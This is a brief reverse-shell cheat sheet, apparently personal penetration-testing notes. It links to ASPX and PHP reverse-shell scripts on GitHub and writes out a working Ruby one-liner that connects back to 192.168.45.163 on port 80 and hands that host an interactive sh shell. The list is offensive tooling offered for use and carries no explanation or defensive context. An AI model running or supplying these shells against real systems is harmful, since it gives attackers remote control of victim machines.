Reverse Shell Script
Aspx
https://github.com/borjmz/aspx-reverse-shell/blob/master/shell.aspx
PHP
https://github.com/ivan-sincek/php-reverse-shell/blob/master/src/reverse/php_reverse_shell.php
Ruby
ruby -rsocket -e'spawn("sh",[:in,:out,:err]=>TCPSocket.new("192.168.45.163",80))'